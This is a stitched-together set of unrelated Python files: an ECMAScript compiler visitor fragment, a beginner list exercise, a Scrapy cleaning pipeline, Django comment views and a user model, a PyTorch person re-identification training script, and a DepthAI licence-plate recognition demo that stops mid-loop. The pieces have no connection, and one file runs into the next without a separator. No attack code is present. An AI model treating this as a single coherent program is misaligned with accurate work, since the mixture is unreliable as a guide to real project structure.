def visitFunctionBody(self, ctx):
    """Compile a function body via its statement list."""
    dprint("visitFunctionBody")
    ctx.children[0].accept(self)
# Visit a parse tree produced by ECMAScriptParser#eof.
def visitEof(self, ctx):
    """End-of-file node: not expected to be visited directly."""
    raise Utils.UnimplementedVisitorException(ctx)
# Visit a parse tree produced by ECMAScriptParser#UnaryAssignmentExpression.
def visitUnaryAssignmentExpression(self, ctx):
    """Compile prefix `++target` / `--target`.

    Loads the old value, adds/subtracts 1, and stores the result back.
    Unlike the postfix form there is no DUP — presumably the stored new
    value serves as the expression's result; confirm against the VM.
    """
    dprint("visitUnaryAssignmentExpression")
    operator = ctx.children[0]
    if(len(ctx.children) == 2):
        (variable_setter, variable_getter) = self.assignmentVariable(ctx.children, 1, self.AV_IDENTIFIER)
    elif(len(ctx.children) == 4):
        (variable_setter, variable_getter) = self.assignmentVariable(ctx.children, 1, self.AV_MEMBERDOT)
    elif(len(ctx.children) == 5):
        (variable_setter, variable_getter) = self.assignmentVariable(ctx.children, 1, self.AV_INDICE)
    else:
        raise Utils.UnimplementedVisitorException(ctx)
    operator = operator.accept(self)
    variable_getter()
    if(operator == "++"):
        self.add_instruction(OpCode.PUSH, 1)
        self.add_instruction(OpCode.ADD)
    elif(operator == "--"):
        self.add_instruction(OpCode.PUSH, 1)
        self.add_instruction(OpCode.SUB)
    else:
        raise Utils.UnimplementedVisitorException(ctx)
    variable_setter()
|
# 201016 Class Reading "Sequences: Lists, Strings, and Tuples"
# Small Exercises
# 2. Largest Number
# Create a list of numbers, print the largest of the numbers.

# The numbers to search through.
nums = [30, 40, 50, 100]
# Print the largest value (the original comment said "sum" by mistake).
largest = max(nums)
print(largest)
# Read two integers and print them in ascending order.
user_num1 = int(input("Input your first number pls: "))  # fixed typo: "ferst"
user_num2 = int(input("Input your second number pls: "))
if user_num1 > user_num2:
    print('Второе число', user_num2, "\n", 'Первое число', user_num1)
else:
    print('Первое число', user_num1, "\n", 'Второе число', user_num2)
|
# -*- coding: utf-8 -*-
# Define your item pipelines here
#
# Don't forget to add your pipeline to the ITEM_PIPELINES setting
# See: http://doc.scrapy.org/en/latest/topics/item-pipeline.html
import bleach
class BonniePipeline(object):
    """Scrapy item pipeline that sanitises scraped text fields."""

    def strip_html(self, string):
        """Remove every HTML tag from *string* (bleach with an empty whitelist)."""
        return bleach.clean(string, strip=True, tags=[])

    def strip_characters(self, string):
        """Collapse all runs of whitespace into single spaces."""
        return " ".join(string.split())

    def strip(self, string):
        """Full clean-up: drop HTML first, then normalise whitespace."""
        without_html = self.strip_html(string)
        return self.strip_characters(without_html)

    def process_item(self, item, spider):
        """Sanitise the item's text fields and pass the item along."""
        for field in ('datetime', 'description'):
            item[field] = self.strip(item[field])
        return item
|
from django.shortcuts import render
from django.shortcuts import render,get_object_or_404,redirect
from django.views.generic import TemplateView,CreateView,UpdateView,DeleteView,ListView,DetailView
from posts.models import Post
from django.contrib.auth.mixins import LoginRequiredMixin
from django.contrib.auth.decorators import login_required
from django.contrib.auth.views import LoginView,LogoutView
from django.urls import reverse_lazy
from .forms import CommentForm
from .models import Comment
# Create your views here.
def add_comment(request, pk):
    """Attach a new comment to post *pk*; on GET render an empty form.

    Invalid POSTs fall through and re-render the bound form with errors.
    """
    post = get_object_or_404(Post, pk=pk)
    if request.method == 'POST':
        form = CommentForm(request.POST)
        # BUG FIX: is_valid is a method — the bare attribute was always
        # truthy, so invalid forms were being saved anyway.
        if form.is_valid():
            comment = form.save(commit=False)
            comment.post = post
            comment.save()
            return redirect('post:single', pk=post.pk, username=post.user)
    else:
        # BUG FIX: instantiate the form; the class object itself was
        # being passed to the template.
        form = CommentForm()
    return render(request, 'posts/_post.html', context={'form': form})
# class CommentCreateView(CreateView):
# model = Comment
# template_name = "posts/_post.html"
# form_class = CommentForm
# @login_required
# def comment_approve(request,pk):
# comment = get_object_or_404(Comment,pk=pk)
# comment.approve()
# return redirect('blog_app:post_detail',pk=comment.post.pk)
@login_required
def delete_comment(request, pk):
    """Delete comment *pk* and return to its parent post's page."""
    comment = get_object_or_404(Comment, pk=pk)
    # Grab the parent post's pk before deleting — the FK is gone afterwards.
    parent_pk = comment.post.pk
    comment.delete()
    # NOTE(review): add_comment redirects to 'post:single' with a username
    # as well — confirm the URL pattern accepts pk alone.
    return redirect('post:single', pk=parent_pk)
# @login_required
# def publish_post(request,pk):
# post = get_object_or_404(Post,pk=pk)
# post.publish()
# return redirect('blog_app:post_detail',pk=pk) |
from django.forms import ModelForm
from django.contrib.auth.forms import UserCreationForm
from django import forms
from django.contrib.auth.models import User
class CouponApplyForm(forms.Form):
    """Single-field form for entering a discount-coupon code."""
    code = forms.CharField()
|
from django.contrib.auth.base_user import AbstractBaseUser, BaseUserManager
from django.contrib.auth.models import PermissionsMixin
from django.db import models
from django.db.models.signals import post_save
from django.dispatch import receiver
from rest_framework.authtoken.models import Token
from core import settings
class UserManager(BaseUserManager):
    """Manager for the custom phone-number-keyed User model.

    (Original docstring, in Russian, read "Admin model".)
    """
    def create_user(self, phone_number, email=None, password=None):
        """Create a regular, active, non-staff user keyed by phone number."""
        if not phone_number:
            raise ValueError("Users must have a Phone number")
        email = UserManager.normalize_email(email)
        user = self.model(phone_number=phone_number, email=email,
                          is_staff=False, is_active=True, is_superuser=False, )
        user.set_password(password)
        user.save(using=self._db)
        return user
    def create_superuser(self, phone_number, password):
        """Create a user, then promote it to staff + superuser."""
        user = self.create_user(
            phone_number,
            password=password,
        )
        user.is_staff = True
        user.is_superuser = True
        user.save(using=self._db)
        return user
class User(AbstractBaseUser, PermissionsMixin):
    """Custom user model authenticated by phone number.

    (Original docstring, in Russian: "Users model".)
    """
    first_name = models.CharField(verbose_name='Имя, Фамилия', max_length=255)
    email = models.EmailField(verbose_name='Почта', max_length=60,)
    date_joined = models.DateTimeField(verbose_name='Дата/время регистрации',
                                       auto_now_add=True)
    # NOTE(review): SmallIntegerField cannot represent real-world phone
    # numbers (range limits, leading zeros, '+' prefix) — a CharField is
    # the usual choice.  Changing it requires a migration, so only flagged.
    phone_number = models.SmallIntegerField(verbose_name='Номер телефона', unique=True,
                                            default=0)
    last_login = models.DateTimeField(verbose_name='Последний вход',
                                      auto_now=True)
    action = models.CharField(verbose_name='Аукционов сыграно', max_length=255, blank=True)
    action_wins = models.CharField(verbose_name='Аукционов выйграно', max_length=255, blank=True)
    check_accepted = models.BooleanField(verbose_name='Подтверждение регистрации', default=False)
    is_active = models.BooleanField(default=True)
    is_staff = models.BooleanField(default=False)
    is_superuser = models.BooleanField(default=False)
    USERNAME_FIELD = 'phone_number'  # log in with phone number, not username
    REQUIRED_FIELDS = []
    objects = UserManager()
    class Meta:
        verbose_name = 'Пользователь'
        verbose_name_plural = 'Пользователи'
    def __str__(self):
        return self.first_name
@receiver(post_save, sender=settings.AUTH_USER_MODEL)
def create_auth_token(sender, instance=None, created=False, **kwargs):
    """Issue a DRF auth token for every newly created user."""
    if created:
        Token.objects.create(user=instance)
# -*- coding: utf-8 -*-
from __future__ import print_function, division
import os
import time
import argparse
import torch
import torch.nn as nn
import torch.optim as optim
from torch.optim import lr_scheduler
from torch.autograd import Variable
from torchvision import datasets, transforms
from model import PCBModel
from test import test
import utils
# ---------------------- Settings ----------------------
parser = argparse.ArgumentParser(description='Training arguments')
parser.add_argument('--save_path', type=str, default='./model')
parser.add_argument('--dataset', type=str, default='market1501',
                    choices=['market1501', 'cuhk03', 'duke'])
parser.add_argument('--batch_size', default=64, type=int, help='batch_size')
parser.add_argument('--learning_rate', default=0.1, type=float,
                    help='FC params learning rate')
parser.add_argument('--epochs', default=60, type=int,
                    help='The number of epochs to train')
parser.add_argument('--share_conv', action='store_true')
parser.add_argument('--stripes', type=int, default=6)
arg = parser.parse_args()

# Fix random seed (CPU and all GPUs) for reproducibility
torch.manual_seed(1)
torch.cuda.manual_seed_all(1)

# Make saving directory: <save_path>/<dataset>
save_dir_path = os.path.join(arg.save_path, arg.dataset)
os.makedirs(save_dir_path, exist_ok=True)
# ---------------------- Train function ----------------------
def train(model, criterion, optimizer, scheduler, dataloader, num_epochs, device):
    """Train *model* on *dataloader*, evaluating every 10 epochs and checkpointing.

    Args:
        model: PCB model; must expose set_return_features().
        criterion: per-stripe classification loss.
        optimizer: SGD optimizer over the model's parameter groups.
        scheduler: LR scheduler stepped once per epoch.
        dataloader: training DataLoader (dataset must expose .imgs).
        num_epochs: total number of epochs.
        device: torch.device inputs are moved to.

    Uses module-level `arg`, `save_dir_path`, `utils`, and `test`.
    """
    start_time = time.time()

    # Logger instance
    logger = utils.Logger(save_dir_path)
    logger.info('-' * 10)
    logger.info(vars(arg))

    for epoch in range(num_epochs):
        logger.info('Epoch {}/{}'.format(epoch + 1, num_epochs))
        model.train()

        # Training
        running_loss = 0.0
        batch_num = 0
        for inputs, labels in dataloader:
            batch_num += 1
            inputs = inputs.to(device)
            labels = labels.to(device)

            optimizer.zero_grad()
            outputs = model(inputs)

            # Sum up the per-stripe softmax losses (one classifier per stripe)
            loss = 0
            for logits in outputs:
                loss += criterion(logits, labels)

            loss.backward()
            optimizer.step()
            running_loss += loss.item() * inputs.size(0)

        # BUG FIX: scheduler.step() must run AFTER the epoch's optimizer
        # steps (PyTorch >= 1.1 ordering); stepping at the start of the
        # epoch skewed the LR schedule by one epoch.
        scheduler.step()

        epoch_loss = running_loss / len(dataloader.dataset.imgs)
        logger.info('Training Loss: {:.4f}'.format(epoch_loss))

        # Save result to logger
        logger.x_epoch_loss.append(epoch + 1)
        logger.y_train_loss.append(epoch_loss)

        if (epoch + 1) % 10 == 0 or epoch + 1 == num_epochs:
            # Testing / Validating
            torch.cuda.empty_cache()
            model.set_return_features(True)
            CMC, mAP, _ = test(model, arg.dataset, 512)
            model.set_return_features(False)
            logger.info('Testing: top1:%.2f top5:%.2f top10:%.2f mAP:%.2f' %
                        (CMC[0], CMC[4], CMC[9], mAP))
            logger.x_epoch_test.append(epoch + 1)
            logger.y_test['top1'].append(CMC[0])
            logger.y_test['mAP'].append(mAP)
            if epoch + 1 != num_epochs:
                utils.save_network(model, save_dir_path, str(epoch + 1))
        logger.info('-' * 10)

    # Save the loss curve
    logger.save_curve()

    time_elapsed = time.time() - start_time
    logger.info('Training complete in {:.0f}m {:.0f}s'.format(
        time_elapsed // 60, time_elapsed % 60))

    # Save final model weights
    utils.save_network(model, save_dir_path, 'final')
# For debugging
# inputs, classes = next(iter(dataloaders['train']))

# ---------------------- Training settings ----------------------
device = torch.device("cuda" if torch.cuda.is_available() else "cpu")
train_dataloader = utils.getDataLoader(
    arg.dataset, arg.batch_size, 'train', shuffle=True, augment=True)
model = PCBModel(num_classes=len(train_dataloader.dataset.classes),
                 num_stripes=arg.stripes, share_conv=arg.share_conv, return_features=False)
criterion = nn.CrossEntropyLoss()

# Finetune the net: the pretrained backbone gets 1/10 of the base LR;
# the freshly initialised local conv and FC heads get the full LR.
optimizer = optim.SGD([
    {'params': model.backbone.parameters(), 'lr': arg.learning_rate / 10},
    {'params': model.local_conv.parameters() if arg.share_conv else model.local_conv_list.parameters(),
     'lr': arg.learning_rate},
    {'params': model.fc_list.parameters(), 'lr': arg.learning_rate}
], momentum=0.9, weight_decay=5e-4, nesterov=True)
scheduler = lr_scheduler.StepLR(optimizer, step_size=20, gamma=0.1)

# Use multiple GPUs if available
if torch.cuda.device_count() > 1:
    model = nn.DataParallel(model)
model = model.to(device)

# ---------------------- Start training ----------------------
train(model, criterion, optimizer, scheduler, train_dataloader,
      arg.epochs, device)
torch.cuda.empty_cache()
|
import argparse
import threading
import time
from pathlib import Path
import blobconverter
import cv2
import depthai as dai
import numpy as np
parser = argparse.ArgumentParser()
parser.add_argument('-nd', '--no-debug', action="store_true", help="Prevent debug output")
parser.add_argument('-cam', '--camera', action="store_true",
                    help="Use DepthAI 4K RGB camera for inference (conflicts with -vid)")
parser.add_argument('-vid', '--video', type=str,
                    help="Path to video file to be used for inference (conflicts with -cam)")
args = parser.parse_args()

# A source is required: live camera or a video file.
if not args.camera and not args.video:
    raise RuntimeError(
        "No source selected. Use either \"-cam\" to run on RGB camera as a source or \"-vid <path>\" to run on video"
    )

debug = not args.no_debug
openvino_version = "2020.3"  # model-zoo blobs are converted for this OpenVINO release
def cos_dist(a, b):
    """Cosine similarity between vectors *a* and *b*."""
    denom = np.linalg.norm(a) * np.linalg.norm(b)
    return np.dot(a, b) / denom
def to_tensor_result(packet):
    """Map each output tensor's name to a numpy array shaped per its dims."""
    result = {}
    for tensor in packet.getRaw().tensors:
        data = np.array(packet.getLayerFp16(tensor.name))
        result[tensor.name] = data.reshape(tensor.dims)
    return result
def frame_norm(frame, bbox):
    """Scale a normalised (0..1) bbox to integer pixel coords of *frame*."""
    height, width = frame.shape[:2]
    scale = np.array([width, height, width, height])
    return (np.clip(np.array(bbox), 0, 1) * scale).astype(int)
def to_planar(arr: np.ndarray, shape: tuple) -> list:
    """Resize *arr* to *shape* and flatten it in planar (CHW) order."""
    resized = cv2.resize(arr, shape)
    return resized.transpose(2, 0, 1).flatten()
def create_pipeline():
    """Build the DepthAI pipeline.

    Two detectors (license plates + vehicles) feed two second-stage networks
    (plate OCR + vehicle attributes). With -cam the camera preview feeds the
    detectors; otherwise XLinkIn queues are fed from the host with frames
    decoded from the video file. All results come back over XLinkOut queues.
    """
    print("Creating pipeline...")
    pipeline = dai.Pipeline()
    # Blobs are converted for this OpenVINO release; pipeline must match.
    pipeline.setOpenVINOVersion(version=dai.OpenVINO.Version.VERSION_2020_3)
    if args.camera:
        print("Creating Color Camera...")
        cam = pipeline.createColorCamera()
        # 672x384 preview matches the vehicle detector's expected input size.
        cam.setPreviewSize(672, 384)
        cam.setResolution(dai.ColorCameraProperties.SensorResolution.THE_1080_P)
        cam.setInterleaved(False)
        cam.setBoardSocket(dai.CameraBoardSocket.RGB)
        cam_xout = pipeline.createXLinkOut()
        cam_xout.setStreamName("cam_out")
        cam.preview.link(cam_xout.input)
    # NeuralNetwork
    print("Creating License Plates Detection Neural Network...")
    det_nn = pipeline.createMobileNetDetectionNetwork()
    det_nn.setConfidenceThreshold(0.5)
    det_nn.setBlobPath(str(blobconverter.from_zoo(name="vehicle-license-plate-detection-barrier-0106", shaves=4, version=openvino_version)))
    # Keep only the freshest frame; drop instead of blocking when busy.
    det_nn.input.setQueueSize(1)
    det_nn.input.setBlocking(False)
    det_nn_xout = pipeline.createXLinkOut()
    det_nn_xout.setStreamName("det_nn")
    det_nn.out.link(det_nn_xout.input)
    # Passthrough carries the exact frame each detection was computed on.
    det_pass = pipeline.createXLinkOut()
    det_pass.setStreamName("det_pass")
    det_nn.passthrough.link(det_pass.input)
    if args.camera:
        # Camera preview is 672x384; the plate detector needs 300x300 BGR planar.
        manip = pipeline.createImageManip()
        manip.initialConfig.setResize(300, 300)
        manip.initialConfig.setFrameType(dai.RawImgFrame.Type.BGR888p)
        cam.preview.link(manip.inputImage)
        manip.out.link(det_nn.input)
    else:
        det_xin = pipeline.createXLinkIn()
        det_xin.setStreamName("det_in")
        det_xin.out.link(det_nn.input)
    # NeuralNetwork
    print("Creating Vehicle Detection Neural Network...")
    veh_nn = pipeline.createMobileNetDetectionNetwork()
    veh_nn.setConfidenceThreshold(0.5)
    veh_nn.setBlobPath(str(blobconverter.from_zoo(name="vehicle-detection-adas-0002", shaves=4, version=openvino_version)))
    veh_nn.input.setQueueSize(1)
    veh_nn.input.setBlocking(False)
    veh_nn_xout = pipeline.createXLinkOut()
    veh_nn_xout.setStreamName("veh_nn")
    veh_nn.out.link(veh_nn_xout.input)
    veh_pass = pipeline.createXLinkOut()
    veh_pass.setStreamName("veh_pass")
    veh_nn.passthrough.link(veh_pass.input)
    if args.camera:
        cam.preview.link(veh_nn.input)
    else:
        veh_xin = pipeline.createXLinkIn()
        veh_xin.setStreamName("veh_in")
        veh_xin.out.link(veh_nn.input)
    # Second stage: plate OCR; crops are sent from the host via "rec_in".
    rec_nn = pipeline.createNeuralNetwork()
    rec_nn.setBlobPath(str(blobconverter.from_zoo(name="license-plate-recognition-barrier-0007", shaves=4, version=openvino_version)))
    rec_nn.input.setBlocking(False)
    rec_nn.input.setQueueSize(1)
    rec_xout = pipeline.createXLinkOut()
    rec_xout.setStreamName("rec_nn")
    rec_nn.out.link(rec_xout.input)
    rec_pass = pipeline.createXLinkOut()
    rec_pass.setStreamName("rec_pass")
    rec_nn.passthrough.link(rec_pass.input)
    rec_xin = pipeline.createXLinkIn()
    rec_xin.setStreamName("rec_in")
    rec_xin.out.link(rec_nn.input)
    # Second stage: vehicle color/type attributes; crops sent via "attr_in".
    attr_nn = pipeline.createNeuralNetwork()
    attr_nn.setBlobPath(str(blobconverter.from_zoo(name="vehicle-attributes-recognition-barrier-0039", shaves=4, version=openvino_version)))
    attr_nn.input.setBlocking(False)
    attr_nn.input.setQueueSize(1)
    attr_xout = pipeline.createXLinkOut()
    attr_xout.setStreamName("attr_nn")
    attr_nn.out.link(attr_xout.input)
    attr_pass = pipeline.createXLinkOut()
    attr_pass.setStreamName("attr_pass")
    attr_nn.passthrough.link(attr_pass.input)
    attr_xin = pipeline.createXLinkIn()
    attr_xin.setStreamName("attr_in")
    attr_xin.out.link(attr_nn.input)
    print("Pipeline created.")
    return pipeline
class FPSHandler:
    """Tracks overall frame throughput plus named per-stage tick counters."""

    def __init__(self, cap=None):
        # Two separate time.time() reads, timestamp first, matching the
        # ordering the rate computations rely on.
        self.timestamp = time.time()
        self.start = time.time()
        # Source FPS is only known when replaying a video file.
        self.framerate = None if cap is None else cap.get(cv2.CAP_PROP_FPS)
        self.frame_cnt = 0
        self.ticks = {}
        self.ticks_cnt = {}

    def next_iter(self):
        """Advance the frame counter; in video mode, pace to the file's FPS."""
        if not args.camera:
            target = self.timestamp + 1.0 / self.framerate
            remaining = target - time.time()
            if remaining > 0:
                time.sleep(remaining)
        self.timestamp = time.time()
        self.frame_cnt += 1

    def tick(self, name):
        """Record one event for `name`; the first tick only starts the clock."""
        if name not in self.ticks:
            self.ticks[name] = time.time()
            self.ticks_cnt[name] = 0
        else:
            self.ticks_cnt[name] += 1

    def tick_fps(self, name):
        """Events per second for `name` since its first tick (0 if never ticked)."""
        if name not in self.ticks:
            return 0
        return self.ticks_cnt[name] / (time.time() - self.ticks[name])

    def fps(self):
        """Overall frames per second since construction."""
        return self.frame_cnt / (self.timestamp - self.start)
# Shared state exchanged between the worker threads and the main display loop.
running = True
license_detections = []
vehicle_detections = []
# Newest-first result lists, capped at 10 entries by the worker threads.
rec_results = []
attr_results = []
# Sequence bookkeeping: frame_seq_map maps a sequence number to its source
# frame so detector passthroughs can be paired with the right image.
frame_det_seq = 0
frame_seq_map = {}
veh_last_seq = 0
lic_last_seq = 0
if args.camera:
    fps = FPSHandler()
else:
    # In video mode, pace playback to the file's native FPS.
    cap = cv2.VideoCapture(str(Path(args.video).resolve().absolute()))
    fps = FPSHandler(cap)
def lic_thread(det_queue, det_pass, rec_queue):
    """Consume license-plate detections, crop each plate and queue it for OCR.

    Runs until the global `running` flag is cleared. Updates the globals
    `license_detections` (for the display loop) and `lic_last_seq` (for
    frame_seq_map garbage collection).
    """
    global license_detections, lic_last_seq
    while running:
        try:
            in_det = det_queue.get().detections
            in_pass = det_pass.get()
            # Pair the passthrough with its source frame via sequence number.
            orig_frame = frame_seq_map.get(in_pass.getSequenceNum(), None)
            if orig_frame is None:
                continue
            # BUG FIX: lic_last_seq was declared global but never assigned, so
            # the frame_seq_map purge in the main loop — keyed on
            # min(lic_last_seq, veh_last_seq) — never advanced and frames
            # accumulated without bound. Track it the same way veh_thread
            # tracks veh_last_seq.
            lic_last_seq = in_pass.getSequenceNum()
            # Label 2 corresponds to license plates for this detection model.
            license_detections = [detection for detection in in_det if detection.label == 2]
            for detection in license_detections:
                bbox = frame_norm(orig_frame, (detection.xmin, detection.ymin, detection.xmax, detection.ymax))
                cropped_frame = orig_frame[bbox[1]:bbox[3], bbox[0]:bbox[2]]
                tstamp = time.monotonic()
                img = dai.ImgFrame()
                img.setTimestamp(tstamp)
                img.setType(dai.RawImgFrame.Type.BGR888p)
                # The recognition network expects a 94x24 planar BGR input.
                img.setData(to_planar(cropped_frame, (94, 24)))
                img.setWidth(94)
                img.setHeight(24)
                rec_queue.send(img)
            fps.tick('lic')
        except RuntimeError:
            # Queue was closed (device shutting down); retry until `running` clears.
            continue
def veh_thread(det_queue, det_pass, attr_queue):
    """Consume vehicle detections, crop each vehicle and queue it for attribute recognition.

    Runs until the global `running` flag is cleared; updates the globals
    `vehicle_detections` and `veh_last_seq`.
    """
    global vehicle_detections, veh_last_seq
    while running:
        try:
            vehicle_detections = det_queue.get().detections
            in_pass = det_pass.get()
            seq_num = in_pass.getSequenceNum()
            # Pair the passthrough with its source frame via sequence number.
            orig_frame = frame_seq_map.get(seq_num, None)
            if orig_frame is None:
                continue
            veh_last_seq = seq_num
            for det in vehicle_detections:
                box = frame_norm(orig_frame, (det.xmin, det.ymin, det.xmax, det.ymax))
                crop = orig_frame[box[1]:box[3], box[0]:box[2]]
                img = dai.ImgFrame()
                img.setTimestamp(time.monotonic())
                img.setType(dai.RawImgFrame.Type.BGR888p)
                # The attribute network expects a 72x72 planar BGR input.
                img.setData(to_planar(crop, (72, 72)))
                img.setWidth(72)
                img.setHeight(72)
                attr_queue.send(img)
            fps.tick('veh')
        except RuntimeError:
            # Queue was closed (device shutting down); retry until `running` clears.
            continue
# Output alphabet of license-plate-recognition-barrier-0007: digits, Chinese
# province/region tokens, the special <police> tag, and Latin letters.
# The model emits indices into this list, terminated by -1.
items = ["0", "1", "2", "3", "4", "5", "6", "7", "8", "9", "<Anhui>", "<Beijing>", "<Chongqing>", "<Fujian>", "<Gansu>",
         "<Guangdong>", "<Guangxi>", "<Guizhou>", "<Hainan>", "<Hebei>", "<Heilongjiang>", "<Henan>", "<HongKong>",
         "<Hubei>", "<Hunan>", "<InnerMongolia>", "<Jiangsu>", "<Jiangxi>", "<Jilin>", "<Liaoning>", "<Macau>",
         "<Ningxia>", "<Qinghai>", "<Shaanxi>", "<Shandong>", "<Shanghai>", "<Shanxi>", "<Sichuan>", "<Tianjin>",
         "<Tibet>", "<Xinjiang>", "<Yunnan>", "<Zhejiang>", "<police>", "A", "B", "C", "D", "E", "F", "G", "H", "I",
         "J", "K", "L", "M", "N", "O", "P", "Q", "R", "S", "T", "U", "V", "W", "X", "Y", "Z"]
def rec_thread(q_rec, q_pass):
    """Decode license-plate OCR outputs and keep the 10 most recent for display.

    Runs until the global `running` flag is cleared; updates the global
    `rec_results` list (newest first).
    """
    global rec_results
    while running:
        try:
            rec_data = q_rec.get().getFirstLayerFp16()
            rec_frame = q_pass.get().getCvFrame()
        except RuntimeError:
            # Queue was closed (device shutting down); retry until `running` clears.
            continue
        # The model emits a sequence of class indices terminated by -1.
        decoded_text = ""
        for idx in rec_data:
            if idx == -1:
                break
            decoded_text += items[int(idx)]
        # Prepend the newest result; keep at most 10 entries.
        rec_results = [(cv2.resize(rec_frame, (200, 64)), decoded_text)] + rec_results[:9]
        # BUG FIX: this previously called fps.tick_fps('rec'), which only *reads*
        # the rate and never registers a tick, so the displayed REC FPS was
        # always 0. Register the tick like lic_thread/veh_thread do.
        fps.tick('rec')
def attr_thread(q_attr, q_pass):
    """Decode vehicle color/type attributes and keep the 10 most recent for display.

    Runs until the global `running` flag is cleared; updates the global
    `attr_results` list (newest first).
    """
    global attr_results
    while running:
        try:
            attr_data = q_attr.get()
            attr_frame = q_pass.get().getCvFrame()
        except RuntimeError:
            # Queue was closed (device shutting down); retry until `running` clears.
            continue
        # Class labels of vehicle-attributes-recognition-barrier-0039.
        colors = ["white", "gray", "yellow", "red", "green", "blue", "black"]
        types = ["car", "bus", "truck", "van"]
        in_color = np.array(attr_data.getLayerFp16("color"))
        in_type = np.array(attr_data.getLayerFp16("type"))
        color = colors[in_color.argmax()]
        color_prob = float(in_color.max())
        # Renamed from `type` to avoid shadowing the builtin.
        vehicle_type = types[in_type.argmax()]
        type_prob = float(in_type.max())
        attr_results = [(attr_frame, color, vehicle_type, color_prob, type_prob)] + attr_results[:9]
        # BUG FIX: this previously called fps.tick_fps('attr'), which only reads
        # the rate; register the tick so the displayed ATTR FPS is meaningful.
        fps.tick('attr')
print("Starting pipeline...")
# Main driver: open the device, spin up one thread per NN output stream,
# then loop feeding frames and rendering debug windows until EOF or 'q'.
with dai.Device(create_pipeline()) as device:
    if args.camera:
        cam_out = device.getOutputQueue("cam_out", 1, True)
    else:
        # Host-side input queues used only in video mode.
        det_in = device.getInputQueue("det_in")
        veh_in = device.getInputQueue("veh_in")
        rec_in = device.getInputQueue("rec_in")
        attr_in = device.getInputQueue("attr_in")
    det_nn = device.getOutputQueue("det_nn", 1, False)
    det_pass = device.getOutputQueue("det_pass", 1, False)
    veh_nn = device.getOutputQueue("veh_nn", 1, False)
    veh_pass = device.getOutputQueue("veh_pass", 1, False)
    rec_nn = device.getOutputQueue("rec_nn", 1, False)
    rec_pass = device.getOutputQueue("rec_pass", 1, False)
    attr_nn = device.getOutputQueue("attr_nn", 1, False)
    attr_pass = device.getOutputQueue("attr_pass", 1, False)
    # One worker thread per result stream; they publish into the globals
    # consumed by the debug rendering below.
    det_t = threading.Thread(target=lic_thread, args=(det_nn, det_pass, rec_in))
    det_t.start()
    veh_t = threading.Thread(target=veh_thread, args=(veh_nn, veh_pass, attr_in))
    veh_t.start()
    rec_t = threading.Thread(target=rec_thread, args=(rec_nn, rec_pass))
    rec_t.start()
    attr_t = threading.Thread(target=attr_thread, args=(attr_nn, attr_pass))
    attr_t.start()
    def should_run():
        # Camera mode runs until interrupted; video mode until the file ends.
        return cap.isOpened() if args.video else True
    def get_frame():
        """Fetch the next frame and register it in frame_seq_map."""
        global frame_det_seq
        if args.video:
            read_correctly, frame = cap.read()
            if read_correctly:
                frame_seq_map[frame_det_seq] = frame
                frame_det_seq += 1
            return read_correctly, frame
        else:
            in_rgb = cam_out.get()
            frame = in_rgb.getCvFrame()
            frame_seq_map[in_rgb.getSequenceNum()] = frame
            return True, frame
    try:
        while should_run():
            read_correctly, frame = get_frame()
            if not read_correctly:
                break
            # Drop frames both detector threads are already past.
            for map_key in list(filter(lambda item: item <= min(lic_last_seq, veh_last_seq), frame_seq_map.keys())):
                del frame_seq_map[map_key]
            fps.next_iter()
            if not args.camera:
                # Video mode: push the frame to both detectors ourselves.
                # NOTE(review): get_frame() stored this frame under
                # frame_det_seq - 1 but the frames are tagged with the
                # already-incremented frame_det_seq, so passthrough lookups
                # appear shifted by one frame — confirm intended.
                tstamp = time.monotonic()
                lic_frame = dai.ImgFrame()
                lic_frame.setData(to_planar(frame, (300, 300)))
                lic_frame.setTimestamp(tstamp)
                lic_frame.setSequenceNum(frame_det_seq)
                lic_frame.setType(dai.RawImgFrame.Type.BGR888p)
                lic_frame.setWidth(300)
                lic_frame.setHeight(300)
                det_in.send(lic_frame)
                veh_frame = dai.ImgFrame()
                # NOTE(review): this 300x300 setData/setWidth/setHeight is
                # immediately overwritten with 672x384 below — the first
                # resize is wasted work.
                veh_frame.setData(to_planar(frame, (300, 300)))
                veh_frame.setTimestamp(tstamp)
                veh_frame.setSequenceNum(frame_det_seq)
                veh_frame.setType(dai.RawImgFrame.Type.BGR888p)
                veh_frame.setWidth(300)
                veh_frame.setHeight(300)
                veh_frame.setData(to_planar(frame, (672, 384)))
                veh_frame.setWidth(672)
                veh_frame.setHeight(384)
                veh_in.send(veh_frame)
            if debug:
                # Draw detection boxes plus per-stage FPS counters.
                debug_frame = frame.copy()
                for detection in license_detections + vehicle_detections:
                    bbox = frame_norm(debug_frame, (detection.xmin, detection.ymin, detection.xmax, detection.ymax))
                    cv2.rectangle(debug_frame, (bbox[0], bbox[1]), (bbox[2], bbox[3]), (255, 0, 0), 2)
                cv2.putText(debug_frame, f"RGB FPS: {round(fps.fps(), 1)}", (5, 15), cv2.FONT_HERSHEY_SIMPLEX, 0.5,
                            (0, 255, 0))
                cv2.putText(debug_frame, f"LIC FPS: {round(fps.tick_fps('lic'), 1)}", (5, 30), cv2.FONT_HERSHEY_SIMPLEX,
                            0.5, (0, 255, 0))
                cv2.putText(debug_frame, f"VEH FPS: {round(fps.tick_fps('veh'), 1)}", (5, 45), cv2.FONT_HERSHEY_SIMPLEX,
                            0.5, (0, 255, 0))
                cv2.putText(debug_frame, f"REC FPS: {round(fps.tick_fps('rec'), 1)}", (5, 60), cv2.FONT_HERSHEY_SIMPLEX,
                            0.5, (0, 255, 0))
                cv2.putText(debug_frame, f"ATTR FPS: {round(fps.tick_fps('attr'), 1)}", (5, 75), cv2.FONT_HERSHEY_SIMPLEX,
                            0.5, (0, 255, 0))
                cv2.imshow("rgb", debug_frame)
                # Stack the recent OCR results (crop | decoded text) vertically.
                rec_stacked = None
                for rec_img, rec_text in rec_results:
                    rec_placeholder_img = np.zeros((64, 200, 3), np.uint8)
                    cv2.putText(rec_placeholder_img, rec_text, (5, 25), cv2.FONT_HERSHEY_TRIPLEX, 0.5, (0, 255, 0))
                    rec_combined = np.hstack((rec_img, rec_placeholder_img))
                    if rec_stacked is None:
                        rec_stacked = rec_combined
                    else:
                        rec_stacked = np.vstack((rec_stacked, rec_combined))
                if rec_stacked is not None:
                    cv2.imshow("Recognized plates", rec_stacked)
                # Stack the recent attribute results the same way.
                attr_stacked = None
                for attr_img, attr_color, attr_type, color_prob, type_prob in attr_results:
                    attr_placeholder_img = np.zeros((72, 200, 3), np.uint8)
                    cv2.putText(attr_placeholder_img, attr_color, (15, 30), cv2.FONT_HERSHEY_TRIPLEX, 0.5, (0, 255, 0))
                    cv2.putText(attr_placeholder_img, attr_type, (15, 50), cv2.FONT_HERSHEY_TRIPLEX, 0.5, (0, 255, 0))
